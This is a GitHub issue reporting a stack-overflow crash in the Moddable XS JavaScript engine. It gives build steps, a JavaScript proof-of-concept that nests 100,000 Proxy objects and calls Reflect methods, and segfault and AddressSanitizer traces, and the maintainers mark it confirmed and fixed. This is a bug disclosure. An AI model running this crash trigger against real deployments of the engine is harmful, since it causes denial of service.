Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

stack-overflow in xs/sources/xsType.c:518 in fxOrdinaryGetProperty #739

Closed
eternalsakura opened this issue Dec 5, 2021 · 1 comment
Closed
Labels
confirmed issue reported has been reproduced fixed - please verify Issue has been fixed. Please verify and close.

Comments

@eternalsakura
Copy link

Build environment

  • operating system: ubuntu20.04
  • compile command:
cd /pathto/moddable/xs/makefiles/lin
make release
  • test command:
./xst poc

poc

function assertThrows(code, type_opt, cause_opt) {
    if (typeof code === 'function')
        return code();
    if (typeof code === 'string')
        return eval(code);
}
let proxy = new Proxy(function () {
}, {});
for (let i = 0; i < 100000; i++) {
    proxy = new Proxy(proxy, {});
}
try {
    Reflect.apply(proxy, {}, []);
} catch (_) {
}
try {
    Reflect.construct(proxy, []);
} catch (_) {
}
try {
    Reflect.defineProperty(proxy, 'x', {});
} catch (_) {
}
try {
    Reflect.deleteProperty(proxy, 'x');
} catch (_) {
}
try {
    Reflect.get(proxy, 'x');
} catch (_) {
}
try {
    Reflect.getOwnPropertyDescriptor(proxy, 'x');
} catch (_) {
}
try {
    Reflect.getPrototypeOf(proxy);
} catch (_) {
}
try {
    Reflect.has(proxy, 'x');
} catch (_) {
}
try {
    Reflect.isExtensible(proxy);
} catch (_) {
}
try {
    Reflect.ownKeys(proxy);
} catch (_) {
}
try {
    Reflect.preventExtensions(proxy);
} catch (_) {
}
try {
    Reflect.setPrototypeOf(proxy, {});
} catch (_) {
}
try {
    Reflect.set(proxy, 'x', {});
} catch (_) {
}
function run(trap, ...args) {
    let handler = {};
    const proxy = new Proxy(function () {
    }, handler);
    handler[trap] = (target, ...args) => Reflect[trap](proxy, ...args);
    return Reflect[trap](proxy, ...args);
}
assertThrows(() => run('apply', {}, []), RangeError);
assertThrows(() => run('construct', []), RangeError);
assertThrows(() => run('defineProperty', 'x', {}), RangeError);
assertThrows(() => run('deleteProperty', 'x'), RangeError);
assertThrows(() => run('get', 'x'), RangeError);
assertThrows(() => run('getOwnPropertyDescriptor', 'x'), RangeError);
assertThrows(() => run('has', 'x'), RangeError);
assertThrows(() => run('isExtensible'), RangeError);
assertThrows(() => run('ownKeys'), RangeError);
assertThrows(() => run('preventExtensions'), RangeError);
assertThrows(() => run('setPrototypeOf', {}), RangeError);
assertThrows(() => run('set', 'x', {}), RangeError);

description

➜  moddable_workdir git:(main) ~/moddable/repo/bin/lin/release/xst poc.js
[1]    1308811 segmentation fault  ~/moddable/repo/bin/lin/release/xst poc.js
...
Stopped reason: SIGSEGV
0x000055555564ba2c in fxOrdinaryGetProperty ()
...

You can use gdb to debug it, then I found that this is a stack overflow, I did not use asan, so this is not a false positive

@eternalsakura
Copy link
Author

➜  moddable_workdir git:(main) ~/moddable/build/bin/lin/release/xst poc.js                        
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1320209==ERROR: AddressSanitizer: stack-overflow on address 0x7ffec720aff8 (pc 0x000000853c71 bp 0x00000096db60 sp 0x7ffec720b000 T0)
    #0 0x853c71 in fxOrdinaryGetProperty /home/sakura/moddable/xs/sources/xsType.c:518
    #1 0x4ded68 in fxGetAll /home/sakura/moddable/xs/sources/xsAPI.c:930:21
    #2 0x74d865 in fxCheckProxyFunction /home/sakura/moddable/xs/sources/xsProxy.c:158:2
    #3 0x7437b4 in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:431:21
    #4 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #5 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #6 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #7 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #8 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #9 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #10 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #11 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #12 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #13 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #14 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #15 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #16 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #17 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #18 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #19 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #20 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #21 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #22 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12

@phoddie phoddie added the confirmed issue reported has been reproduced label Dec 8, 2021
mkellner pushed a commit that referenced this issue Dec 8, 2021
@phoddie phoddie added the fixed - please verify Issue has been fixed. Please verify and close. label Dec 18, 2021
@phoddie phoddie closed this as completed Dec 18, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
confirmed issue reported has been reproduced fixed - please verify Issue has been fixed. Please verify and close.
Projects
None yet
Development

No branches or pull requests

2 participants